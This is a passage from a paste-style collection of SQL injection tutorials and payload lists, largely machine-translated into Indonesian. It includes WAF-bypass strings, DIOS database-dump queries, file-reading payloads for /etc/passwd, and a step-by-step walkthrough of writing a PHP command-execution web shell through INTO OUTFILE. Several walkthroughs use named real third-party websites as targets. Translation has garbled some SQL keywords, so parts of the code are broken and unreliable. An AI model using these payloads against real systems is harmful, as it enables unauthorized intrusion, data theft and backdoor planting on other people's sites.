  3349. 510 ===> (Not extended)
  3350.  
  3351. ~{Injection type}~
  3352. -----------------------------------------------
  3353. HTML Injection - Reflected (GET)
  3354. HTML Injection - Reflected (POST)
  3355. HTML Injection - Reflected (Current URL)
  3356. HTML Injection - Stored (Blog)
  3357. iFrame Injection
  3358. LDAP Injection (Search)
  3359. Mail Header Injection (SMTP)
  3360. OS Command Injection
  3361. OS Command Injection - Blind
  3362. PHP Code Injection
  3363. Server-Side Includes (SSI) Injection
  3364. SQL Injection (GET/Search)
  3365. SQL Injection (GET/Select)
  3366. SQL Injection (POST/Search)
  3367. SQL Injection (POST/Select)
  3368. SQL Injection (AJAX/JSON/jQuery)
  3369. SQL Injection (CAPTCHA)
  3370. SQL Injection (Login Form/Hero)
  3371. SQL Injection (Login Form/User)
  3372. SQL Injection (SQLite)
  3373. SQL Injection (Drupal)
  3374. SQL Injection - Stored (Blog)
  3375. SQL Injection - Stored (SQLite)
  3376. SQL Injection - Stored (User-Agent)
  3377. SQL Injection - Stored (XML)
  3378. SQL Injection - Blind - Boolean-Based
  3379. SQL Injection - Blind - Time-Based
  3380. SQL Injection - Blind (SQLite)
  3381. SQL Injection - Blind (Web Services/SOAP)
  3382. XML/XPath Injection (Login Form)
  3383. XML/XPath Injection (Search)
  3384.  
  3385. Hard WAF Bypass :)
  3386.  
  3387. The Methods
  3388. .
  3389. id=1.unioN/**/distinct%20%73eleCt""a
  3390. id=1%.0unioN/**/distinct%20%73eleCt+-!~
  3391. id=1%""unioN/**/distinct%20%73eleCt@$%
  3392. id=1%''unioN/**/distinct%20%73eleCt@%C0%
  3393. id=1-.0unioN/**/distinct%20%73eleCt@%C0/
  3394. id=1=\NunioN/**/distinct%20%73eleCt@%FF|
  3395. id=1<0.unioN/**/distinct%20%73eleCt@=
  3396. id=1>0.unioN/**/distinct%20%73eleCt~.
  3397. id=1e0unioN/**/distinct%20%73eleCt""$
  3398. id=1^0.unioN/**/distinct%20%73eleCt!~
  3399. id=1|""unioN/**/distinct%20%73eleCt\N$
  3400. id=1|''unioN/**/distinct%20%73eleCt\N%FF
  3401. id=1|.0unioN/**/distinct%20%73eleCt!@
  3402. id=1|\NunioN/**/distinct%20%73eleCt""/
  3403.  
  3404. Source: https://pastebin.com/qzNp6zha
  3405.  
  3406. -Credits.
  3407.  
  3408. Oracle SQL Injection dan DIOS Query
  3409.  
  3410. Dalam Nama ALLAH Yang Maha Pengasih dan Penyayang
  3411.  
  3412. Setelah mendapatkan banyak permintaan untuk menambahkan DIOS dan tutorial Injeksi ralated database lainnya pada Securityidiots. Di sini kita bangun dengan Oracle Based SQL Injection dan DIOS tutorial
  3413.  
  3414. Berikut adalah dasar-dasar Oracle Union Based Injection yang dapat Anda gunakan untuk menyuntikkan situs berbasis oracle Union Based Oracle Injection
  3415.  
  3416. Saya harap membaca Union Based Oracle Injection di atas sekarang Anda tahu cara menyuntikkan situs berbasis oracle, sekarang kita akan menyuntikkan "http://demosite.com/page.php?id=1" di tutorial kami. Mari kita lihat apakah masukan di bawah ini memberi kita kesalahan. Sebelum kita mulai menonton video dasar ini yang berisi bagaimana menggunakan beberapa pertanyaan di bawah ini, maka Anda dapat membaca tutorial yang memberikan penjelasan lebih lanjut dan beberapa contoh lain dari DIOS oracle dan injeksi.
  3417.  
  3418. http://demosite.com/page.php?id=1 '
  3419. Sekarang jika kita memiliki kesalahan memungkinkan menyeimbangkan permintaan.
  3420. http://demosite.com/page.php?id=1 'pesanan oleh 1--
  3421. Tidak Ada Kesalahan
  3422. http://demosite.com/page.php?id=1 'pesanan sebesar 8--
  3423. Tidak Ada Kesalahan
  3424. http://demosite.com/page.php?id=1 'pesanan sebesar 9--
  3425. Kesalahan
  3426. Sekarang kita tahu 8 adalah kolom terakhir yang berfungsi, jadi sekarang kita bisa mencoba serikat pekerja.
  3427. http://demosite.com/page.php?id=1'and 0 = 1 union pilih 111,222,333,444,555,666,777,888--
  3428. Jika Anda mendapatkan beberapa kesalahan, maka cobalah
  3429. http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
  3430. dan temukan kolom yang rentan secara manual, tetapi anggaplah itu juga tidak berhasil, maka cobalah ini.
  3431. http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
  3432. Semoga mencampur salah satu trik di atas dapat berhasil.
  3433. Anggaplah ketiga adalah kolom rentan, yang dicetak di layar. Mari mulai mengekstraksi data melalui kolom ketiga, pertama-tama kita akan mengekstrak versi database.
  3434. Untuk mendapatkan versi yang kami gunakan (pilih spanduk dari v $ version di mana rownum = 1)
  3435. http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (pilih banner dari v $ version di mana rownum = 1), NULL, NULL, NULL, NULL, NULL--
  3436. Sekarang mari dapatkan database saat ini menggunakan SYS.DATABASE_NAME.
  3437. http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, SYS.DATABASE_NAME, NULL, NULL, NULL, NULL, NULL--
  3438. Sekarang sisa bagian yang akan kita lakukan menggunakan DIOS (Dump dalam satu tembakan) untuk Oracle. Tidak seperti DIOS Oracle DOS lain yang sederhana di mana kita hanya menggunakan fungsi wm_concat untuk mengekstrak data dari database.
  3439. http://demosite.com/page.php?id=1'and 0 = 1 union pilih NULL, NULL, (PILIH ganti (wm_concat ('<li>' || table_name), ',', '') FROM all_table), NULL, NULL, NULL, NULL, NULL--
  3440. Query di atas akan memberi Anda semua tabel, sekarang mari kita dapatkan kolom untuk tabel, tapi itu tidak semuanya lebih dari apa yang dapat Anda lakukan: D. Karena wm_concat terbatas dalam output, kami tidak dapat menyebutnya DIOS lengkap, jadi ya kami akan segera bekerja pada beberapa versi lain untuk DIOS Oracle, tetapi untuk sekarang di sini ada beberapa cara lain yang dapat Anda coba.
  3441. http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih LISTAGG (table_name,' <li> ') dalam grup ( ORDER BY table_name) dari all_tables) || '<! -', NULL, NULL dari dual - & lang = it
  3442.  
  3443. http://www.beaconhouse.edu.pk/cms_main_career.php?id=9&subpg=1&pjobid=-22050 dan 0 = 1 UNION + SELECT NULL, (pilih wm_concat ('<li>' || table_name || ':' || column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns urutan oleh table_name desc) shell di mana rnum <120) || '<! -', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL dari dual--
  3444.  
  3445. http://www.technoriunite.it/pages.php?p=cut-linear ') dan 1 = 0 union pilih null,' "> '|| (pilih wm_concat (' <li> '|| table_name ||' : '|| column_name) from (pilih rownum as rnum, table_name, column_name dari all_tab_columns order oleh table_name desc) shell di mana rnum <120) ||' <! - ', NULL, NULL dari dual - & lang = it
  3446. Itu semua untuk saat ini, sampai jumpa lagi dengan tutorial kami berikutnya: D
  3447.  
  3448. Diko rin naget ke hahaha. share ko nalang: D
  3449.  
  3450. Sumber: SecurityIdiots.com
  3451.  
  3452.  
  3453. Bypass 404 :)
  3454.  
  3455. bypass1: order by x,x-- -
  3456. bypass2: union select x,x-- -
  3457. bypass3: =-x' UNION /*!SELECT*/ x,x-- -
  3458. bypass4: x,x,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
  3459. bypass5: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database()-- -
  3460. bypass6: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,table_name) from information_schema./*!tables*/ where table_schema=database()-- -
  3461. bypass7: /*!UNION /*!SeLeCT*/ 1,2,concat_ws(0x7c,column_name) from information_schema./*!columns*/ where table_name=0x(convert to hex)-- -
  3462. bypass8: /*!UNION /*!SeLeCT*/ 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x7c,abc),14,15,16,17,18 from xyz-- -
  3463.  
  3464.  
  3465. SQLi Waf Bypass
  3466.  
  3467. /*!31337ConCaT*/(0x496e6a656374656420627920316d70333231756d3c62723e486f73746e616d653a20,@@hostname,0x3c62723e44617461626173653a20,database/**X**/(),0x3c62723e56657273696f6e3a20,version/**X**/(),0x3c62723e557365723a20,user/**X**/(),0x3c62723e,(/*!31337sELecT*/(@)/*!31337from*/(/*!31337sELecT*/(@:=0x00),(/*!31337sELecT*/(@)/*!31337from*/(`InFoRMAtiON_sCHeMa`.`ColUMNs`)/*!31337where*/(`TAblE_sCHemA`=DaTaBaSe/**X**/())and(@)in(@:=/*!31337CoNCat*/(@,0x3c62723e20,/*!31337TaBLe_nAMe*/,0x203a3a20,/*!31337column_name*/))))a))
  3468.  
  3469. (/*!31337select*//*!31337concat*/(0x496e6a6563746564206279204e64697669633430343c62723e44617461626173653a20,database/**/(),0x3c62723e56657273696f6e3a20,version/**/(),0x3c62723e,@:=0x2d2d2d,(/*!31337select*/count(*)/*!31337from*//*!31337information_schema*/./*!31337columns*//*!31337WhErE*/(/*!31337TaBlE_ScHeMa*/!=0x696e666f726d6174696f6e5f736368656d61)AND@:=/*!31337concat*/+(@,0x3c62723e,/*!31337table_name*/,0x3a3a,/*!31337column_name*/)),@))
  3470.  
  3471. +div+@div:=(/*!31337concat*/(@c:=0x00,if((/*!31337select*/+/*!31337count*/(*)/*!31337from*/+/*!31337information_schema*/./*!31337columns*/+/*!31337where*/+/*!31337table_schema*/=database/*ndivic*/()+and+@c:=/*!31337concat*/(@c,0x3c62723e, /*!31337table_name*/,0x2e,/*!31337column_name*/)),0x00,0x00),@c))+/*!31337UNION*/+ALL+/*!31337SELECT*/+
  3472.  
  3473. Hai Im Ph.h4rh4r dari Blue Security Hackers
  3474.  
  3475. Saya akan menunjukkan itu adalah Metode berbasis String
  3476.  
  3477. Situs contoh: http://www.gwapoako.com/readnews.php?id=6
  3478.  
  3479. 1: meninggalkan akhir 'pre check jika vuln situs dalam injeksi sql
  3480. http://www.gwapoako.com/readnews.php?id=6 '
  3481.  
  3482. Peringatan: mysql_fetch_array () mengharapkan parameter 1 menjadi sumber daya, boolean diberikan dalam /home/jungleisland/gwapoako.com/readnews.php on line 34
  3483.  
  3484. kesalahan db? berarti rentan.
  3485.  
  3486. ini adalah cara mendapatkan metode berbasis string di situs
  3487.  
  3488. 2: tingkatkan akhir Anda
  3489. http://www.gwapoako.com/readnews.php?id=6 ''
  3490.  
  3491. tidak ada kesalahan diba? berarti Metode Berbasis String tidak akan digunakan
  3492.  
  3493. kami memiliki contoh yang dapat digunakan untuk Metode Berbasis String
  3494. Contoh:
  3495. '- -
  3496. '- +
  3497.  
  3498. 3: periksa apakah beberapa kolom berada di situs menggunakan pesanan oleh.
  3499. http://www.gwapoako.com/readnews.php?id=6 'pesanan sebesar 5-- -
  3500.  
  3501. memesan dengan 5 kesalahan pesanan pero ung oleh 4 ok
  3502. berarti ung situs 4 kolom saya
  3503.  
  3504. 4: menggunakan union pilih.
  3505. http://www.gwapoako.com/readnews.php?id=6 'serikat pilih 1,2,3,4-- -
  3506.  
  3507. Contoh Anda melihat 3 dan 4, itu berarti kolom yang rentan
  3508.  
  3509. 5: Saya akan menggunakan SANG PENCIPTA untuk membuat saya mudah
  3510. (Dengan peretasan)
  3511. DIOS = Dump Dalam Satu Tembakan
  3512.  
  3513. Ini akan menggunakan kueri pra-dump pada tabel dan kolom situs. dan query n ini diletakkan pada kolom vuln pro I letakkan s 3 kolom 3 juga dapat nmn s kolom 4
  3514.  
  3515. make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/ *! 50000column_name * /)), @)
  3516.  
  3517. serikat http://www.gwapoako.com/readnews.php?id=6' pilih 1,2, make_set (6, @ = 0x0a, (/ *! 50000select * / (1) dari (/ *! 50000information_schema. kolom * / di mana @ = make_set (511, @, 0x3c6c693e, / * 50000table_name * / / * 50000column_name * /)), @), 4) -!! 20%
  3518.  
  3519. Selesai 🙂 Selamat Meretas 🙂
  3520.  
  3521. saya akan memberitahu methodh tentang shell upload melalui query
  3522. Pertama-tama menemukan situs web yang rentan terhadap injeksi sql. Anda dapat menemukan situs web oleh dorks atau secara manual seperti saya telah menemukan ini.
  3523. Anda membutuhkan 2 hal utama:
  3524. 1- Jalur Akar dari situs web
  3525. 2- Direktori yang bisa ditulisi
  3526. Sebagian besar waktu, Anda akan melihat jalan root dalam kesalahan SQL situs tersebut. Seperti yang berikut.
  3527. Peringatan: mysql_fetch_assoc () mengharapkan parameter 1 sebagai sumber daya, boolean diberikan di /home/aeiti/public_html/admin/requires/functions.php on line 1327
  3528. Nah Jika situs web yang rentan tidak menunjukkan jalur root maka jangan khawatir saya akan menunjukkan cara untuk mengetahui jalur root. Dan Juga Direktori yang Dapat Ditulis.
  3529. http://www.jantv.in/comments/showmore.php?id=68884 '
  3530. Saya tidak memulai dengan abc dari SQLI Saya harap Anda tahu dasar-dasarnya. : D
  3531. Sekarang kita harus menemukan kolom situs web kemudian kolom yang rentan seperti situs saya memiliki 11 kolom dan 5 kolom rentan
  3532. http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4,5,6,7,8,9,10,11-- -
  3533. http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, versi (), 6,7,8,9,10,11-- -
  3534. Mari Coba Coba Muat Berkas Situs Web
  3535. http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / passwd '), 6,7,8,9,10, 11-- -
  3536. http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / my.cnf '), 6,7,8,9, 10,11-- - -
  3537. http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / group '), 6,7,8,9,10, 11-- -
  3538. http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / services '), 6,7,8,9,10, 11-- -
  3539. http://www.site.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, load_file (' / etc / hosts '), 6,7,8,9,10, 11-- -
  3540. Kami tidak perlu membaca file apa pun yang disebutkan di atas hanya untuk menambah pengetahuan Anda. Sekarang kita harus memeriksa hak akses file untuk pengguna saat ini untuk pertama kali ini Anda harus menemukan nama pengguna saat ini.
  3541. Seperti ini
  3542. http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, current_user, 6,7,8,9,10,11-- -
  3543. Nama Pengguna Saat Ini kami adalah root
  3544. Sekarang Periksa Privilages File untuk root Pengguna
  3545. http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, file_priv, 6,7,8,9,10,11 DARI mysql.user WHERE pengguna = 'root' - -
  3546. yang menunjukkan Y :)
  3547. Jika itu menunjukkan Y (ya) pada kolom rentan situs web yang berarti kita memiliki hak akses file untuk root pengguna saat ini
  3548. Dan jika tidak menunjukkan Y maka jangan buang waktu Anda di sana: D
  3549. Sekarang kita harus menemukan direktori yang bisa ditulisi untuk ini Anda dapat menggunakan google dorks juga dan pengetahuan Anda juga :)
  3550. tapi di sini kamu akan terjebak untuk menemukan direktori ....
  3551. saya tahu Anda berpikir bahwa Anda akan meletakkan 'dan Anda akan mendapatkan direktori dalam kesalahan: p :)
  3552. http://www.jantv.in/comments/showmore.php?id=68884 '
  3553. Lihat tidak ada diektori: D
  3554. sekarang
  3555. ada satu lagi trik untuk mendapatkan direktori
  3556. gunakan "[]" ini sebelumnya = 68884
  3557. seperti
  3558. http://www.jantv.in/comments/showmore.php?id[]=68884
  3559. coba lihat apa yang akan terjadi
  3560. lihat di sini kita mendapatkan direktori :) :)
  3561. sekarang kita akan mengunggah kode jahat kita di kolom vuln 3 :): D: D
  3562. http://www.jantv.in/comments/showmore.php?id=68884 'UniOn SeleCt 1,2,3,4, "<? system ($ _ REQUEST [' sembarang perintah u punya :) ']) ;? > ", 6,7,8,9,10,11 ke dalam file 'outfile' ke C: /wamp/www/comments/name_u_want.php '- + -
  3563. tapi aku punya milikku :)
  3564. saya hanya mengubah kode saya di Hex :)
  3565. http://www.jantv.in/comments/showmore.php?id=68884'+UNION+ALL+SELECT+1,2,3,4,0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646 ke outfile 'C: / wamp / www / comments / any_name_u_want. php '- + -
  3566. maka kamu akan mendapatkan seperti itu artinya kamu meng-upload kode ur :)
  3567. lalu periksa
  3568. http://www.jantv.in/comments/any_name_u_typed.php: D
  3569. Anda akan mendapatkan opsi browse di mana Anda dapat memilih shell Anda
  3570. biarkan melihat
  3571. yang saya singkirkan shell saya :): D saya menemukan shell itu oleh Anas bro thnks Anas bro :)
  3572. ok sekarang lihat opsi unggah
  3573. klik di atasnya
  3574. sekarang lihat file berhasil diunggah :)
  3575. sekarang buka dengan metode yang sama seperti sebelumnya
  3576. http://www.jantv.in/comments/any_name_of_any_thing_u_uploaded.php
  3577. lihat wee berhasil meng-upload shell via query sqli :)
  3578.  
  3579. Terima kasih
  3580.  
  3581. http: // www.che.iitm.ac. di / dalam .php? id = 6
  3582. http: // www.che.iitm.ac. di / dalam .php? id = 6 'Union Select 1,2-- -
  3583. jika Anda mencoba untuk menyeimbangkan pesanan secara normal oleh atau grup saat itu Anda akan
  3584. temukan 2 kolom && this shit error "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda"
  3585. Dalam jenis kesalahan ini kami mencoba beberapa metode seperti
  3586. Kolom 1.Bruteforce,
  3587. 2.do hex di semua kolom
  3588. 3. menghasilkan query + dll
  3589. 4. atau berbasis kesalahan
  3590. Ada opsi lain untuk menyeimbangkan permintaan seperti ini ...
  3591. + GROUP + BY + 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 , 24,25,26,27,
  3592. Sekarang coba cara ini untuk mendapatkan kolom
  3593. http://www.che.iitm.ac.in/inner.php?id=6 '+ GROUP + BY
  3594. + 1, 2,3, 4, 5, 6, 7,8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 , 26, 27, -
  3595. Kolom tidak dikenal '8' di 'pernyataan grup'
  3596. jadi ada 7 kolom :)
  3597. Mari coba ini
  3598. http: // www.che.iitm.ac. di / dalam .php? id = 6 'dan 0 Union Pilih 1,2,3,4,5,6,7-- -
  3599. tetapi ini "Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda" lagi: 3
  3600. Sekarang coba cara Anda untuk melewati kesalahan ini
  3601. http://www.che.iitm.ac.in/inner.php?id=6 'dan 0 Union
  3602. Pilih 111, 2222,3333, 4444, 5555,6666, 7777-- -
  3603. tidak berfungsi
  3604. http: // www.che.iitm.ac. dalam / inner .php? id = 6 'dan 0 Union Select versi (), versi (), versi (), versi (), versi (), versi (), versi () - -
  3605. juga tidak berfungsi
  3606. Anda dapat mencoba lebih banyak cara lain seperti mengganti col palsu, nol atau kekuatan kasar, bt yang panjang
  3607. Dalam tantangan ini saya menemukan sesuatu yang berbeda ...
  3608. : 3
  3609. ok mari coba kueri yang diarahkan
  3610. Kita tahu dalam query yang diarahkan setiap kolom diganti dengan nol atau hex dengan satu "'" atau "1' - -"
  3611. http://www.che.iitm.ac.in/inner.php?id=-6 'Union
  3612. Pilih 1, 0x3227, 3, 4, 5, 6,7 - -
  3613. :)
  3614. ditemukan kesalahan dalam kolom no. 2
  3615. http: // www.che.iitm.ac. di / dalam .php? id = - 6 'Union Select 1, "2' - -", 3,4,5,6,7-- -
  3616. :)
  3617. Jika Anda mencoba ini, Anda akan menemukan kolom 4 secara otomatis
  3618. : D
  3619. atau Anda dapat melakukan penyatuan berdasarkan lagi kolom yang diarahkan ini
  3620. tapi saya katakan menggunakan serikat pilih hanya 1 kali
  3621. sekarang yang lain adalah tugas yang mudah
  3622. Terima kasih .....
  3623.  
  3624.  
  3625. SQL COMMENTS
  3626. ‘ or 1=1#‘ or 1=1– –‘ or 1=1/* (MySQL < 5.1)
  3627. ' or 1=1;%00
  3628. ' or 1=1 union select 1,2 as `
  3629. ' or#newline1='1'
  3630. or– -newline1='1'
  3631. /*!50000or*/1='1'
  3632. /*!or*/1='1
  3633. [-----------------------------------------------------]
  3634. PREFIXES
  3635. + – ~ !
  3636. ‘ or –+2=- -!!!’2
  3637. [-----------------------------------------------------]
  3638. OPERATORS
  3639. ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,,
  3640. XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY,BETWEEN, ISNULL
  3641. [-----------------------------------------------------]
  3642. WHITESPACES
  3643. %20 %09 %0a %0b %0c %0d %a0 /**/
  3644. ‘or+(1)sounds/**/like“1“–%a0-
  3645. ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
  3646. [-----------------------------------------------------]
  3647. No Whitespace Bypass Using Comments
  3648. ?id=1/*comment*/and/**/1=1/**/--
  3649. No Whitespace Bypass Using Parenthesis
  3650. ?id=(1)and(1)=(1)--
  3651. [-----------------------------------------------------]
  3652. EXTRACT SUBSTRINGS
  3653. substr(‘abc’,1,1) = ‘a’
  3654. substr(‘abc’ from 1 for 1) = ‘a’
  3655. substring(‘abc’,1,1) = ‘a’
  3656. substring(‘abc’ from 1 for 1) = ‘a’
  3657. mid(‘abc’,1,1) = ‘a’
  3658. mid(‘abc’ from 1 for 1) = ‘a’
  3659. lpad(‘abc’,1,space(1)) = ‘a’
  3660. rpad(‘abc’,1,space(1)) = ‘a’
  3661. left(‘abc’,1) = ‘a’
  3662. reverse(right(reverse(‘abc’),1)) = ‘a’
  3663. insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
  3664. space(0) = trim(version()from(version()))
  3665. `
  3666. `
  3667. `
  3668. ©M4c
  3669.  
  3670. SQL INJECTION: BYPASSING WAF (WEB APPLICATION FIREWALL)
  3671. *** tutorial ini untuk menunjukkan kepada Anda bagaimana cara Bypass WAF (Aplikasi Web Firewall) ***
  3672. http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+Union+select+1,2,3,4,5,6,7,8,9--
  3673. seperti yang kita lihat [pilih] adalah down double text [Mengganti kata kunci] seperti SeLselectECT ini
  3674. www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--
  3675. [5] WAF Bypassing - menggunakan karakter.
  3676. Ada banyak sekali karakter yang tersedia yang dapat kita gunakan untuk mem-bypass filter WAF.
  3677. karakter berikut dapat melakukan ini:
  3678. |,?, ", ', *,%, £, [],;,:, \ /, $, €, () ...
  3679. dengan menggunakan karakter ini dalam banyak kasus / *! * / tidak difilter. Tetapi tanda * diganti dengan spasi dan kesatuan - pilih disaring. yang berarti mengganti kata kunci tidak akan berfungsi.
  3680. Dalam kasus ini kita dapat menggunakan karakter * untuk memisahkan kata kunci.
  3681. Kami akan melakukan hal logis berikutnya:
  3682. www. [situs] .com / index.php? id = -1 + uni * pada + sel * ect + 1,2,3,4 - + -
  3683. Hampir sama dengan membagi kata kunci.
  3684. Tetapi dalam hal ini hanya * disaring oleh itu menggantikannya sedikit pun ruang memiliki hasil yang sama seperti dalam membagi kata kunci.
  3685. [6] Advanced WAF Bypassing - Kapitalisasi.
  3686. Cara lain adalah dengan hanya memanfaatkan karakter kita.
  3687. Daripada unIoN serikat Dalam beberapa dasar WAF ini akan berhasil.
  3688. Contoh di URL:
  3689. www. [site] .com / index.php? id = -1 + UnIoN + SeLeCt + 1,2,3,4 - + -
  3690. [7] Polusi Parameter HTTP (HPP)
  3691. HTTP Parameter Pollution (HPP) adalah teknik penghindaran serangan Web yang memungkinkan penyerang untuk membuat permintaan HTTP untuk memanipulasi atau mengambil informasi tersembunyi. Teknik pengelakan ini didasarkan pada pemisahan vektor serangan antara beberapa contoh parameter dengan nama yang sama. Karena tidak ada RFC HTTP yang relevan mendefinisikan semantik manipulasi parameter HTTP, setiap platform pengiriman aplikasi web dapat mengatasinya secara berbeda. Secara khusus, beberapa lingkungan memproses permintaan seperti itu dengan menggabungkan nilai-nilai yang diambil dari semua contoh nama parameter dalam permintaan. Perilaku ini disalahgunakan oleh penyerang untuk mem-bypass mekanisme keamanan berbasis pola.
  3692. kita melihat dua vektor injeksi SQL: "Regular attack" dan "Attack using HPP". Serangan reguler menunjukkan injeksi SQL standar dalam parameter prodID. Serangan ini dapat dengan mudah diidentifikasi oleh mekanisme deteksi keamanan, seperti Firewall Aplikasi Web (WAF). Serangan kedua [Gambar 2] menggunakan HPP pada parameter prodID. Dalam hal ini, vektor serangan didistribusikan di beberapa kejadian parameter prodID. Dengan kombinasi yang tepat dari lingkungan teknologi dan server web, serangan itu berhasil. Agar WAF untuk mengidentifikasi dan memblokir vektor serangan lengkap yang diperlukan untuk juga memeriksa input gabungan.
  3693. http://testasp.vulnweb.com/showforum.asp?id=-1 union pilih 1,2 -
  3694. testasp.vulnweb.com/showforum.asp?id=-1/* & id = * / union / * & id = * / select / * & id = * / 1,2 -
  3695. Teknik HPP
  3696. Spoiler (Klik untuk Melihat)
  3697. [8] Teknik Bypass WAF CRLF
  3698. CR LF berarti "Pengangkutan Kembali, Umpan Jalur"
  3699. CR LF berarti "Carriage Return, Line Feed" -itu adalah hangover DOS dari masa lalu ketika beberapa perangkat memerlukan Pengembalian Pengangkutan, dan beberapa perangkat membutuhkan Feed Line untuk mendapatkan baris baru, sehingga Microsoft memutuskan untuk membuat baris memiliki kedua karakter, sehingga mereka akan menampilkan dengan benar di semua perangkat.
  3700. Program Windows mengharapkan format baris baru mereka di CRLF (\ r \ n). * nix hanya mengharapkan data LF (\ n). Jika Anda membuka dokumen teks Unix di Notepad pada windows, Anda akan melihat bahwa semua jeda baris menghilang dan seluruh dokumen berada pada satu baris. Itu karena Notepad mengharapkan data CRLF, dan dokumen Unix tidak memiliki karakter.
  3701. Ada aplikasi yang akan mengkonversi ini untuk Anda pada distro * nix standar (dos2unix dan unix2dos)
  3702. Bagi mereka yang bertanya-tanya, pengembalian pengangkutan dan feed garis berbeda dari kembali pada hari-hari Mesin Ketik, ketika pengembalian carriage dan feed baris adalah dua hal yang berbeda. Satu akan membawa Anda ke awal baris (Carriage Return) dan satu akan memindahkan Anda satu baris lebih rendah, tetapi di lokasi horizontal yang sama (Line Feed)
  3703. Teknik CRLF
  3704. Sintaks:
  3705. Kode PHP:
  3706. % 0A% 0D + Pernyataan Mysql +% 0A% 0D
  3707. ? id = -2 +% 0A% 0D / *!% 0A% 0Dunion * / +% 0A% 0D / *! 50000Pilih * /% 0A% 0D / *! + 77771,77772, unhex (hex (/ *! kata sandi * /)), 77774 + dari + / *! `Users` * / - -
  3708. Contoh di URL:
  3709. fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 -
  3710. [9] Kesalahan Fatal Terjadi melewati
  3711. untuk memahami bagaimana kami dapat melewati Fatal Error Terjadi lihat Contoh ini:
  3712. Contoh di URL:
  3713. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--
  3714. Yang disimpulkan bahwa kesalahan dalam struktur salah satu kolom Untuk menghindari kesalahan ini cobalah mengubah nilai kolom kolom kata null satu per satu: -
  3715. Kode PHP:
  3716. http://wwfa.org.uk/article.php?id=-174 UNION SELECT null, 2,3,4,5,6,7,8-- Kesalahan
  3717. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1, null, 3,4,5,6,7,8-- Kesalahan
  3718. http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2, null, 4,5,6,7,8-- Kesalahan
  3719. http://wwfa.org.uk/article.
  3720.  
  3721. DIOS Query Collections
  3722.  
  3723.  
  3724. 1. Show All Database --->
  3725.  
  3726. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=/*!50000concat*/(@a,schema_name,'
  3727. '))))a)
  3728.  
  3729. 2.Show All Tables --->
  3730.  
  3731. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=/*!50000concat*/(@a,table_name,'
  3732. '))))a)
  3733.  
  3734. 3. Show All Tables without information_schema ---->
  3735.  
  3736. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_name,'
  3737. '))))a)
  3738.  
  3739.  
  3740. 4. Show All Database and Tables --->
  3741.  
  3742. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,0x3a,table_name,'
  3743. '))))a)
  3744.  
  3745.  
  3746. 5. Show All Database and Tables and Columns --->
  3747.  
  3748. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=/*!50000concat*/(@a,table_schema,' > ',table_name,' > ',column_name,'
  3749. '))))a)
  3750.  
  3751.  
  3752. 6.Show Target Hacker Tables Name ---->
  3753.  
  3754.  
  3755. (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'Hacker_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'
  3756. '))))a)
  3757.  
  3758.  
  3759. 7.Show Each Table and All Table Columns ---->
  3760.  
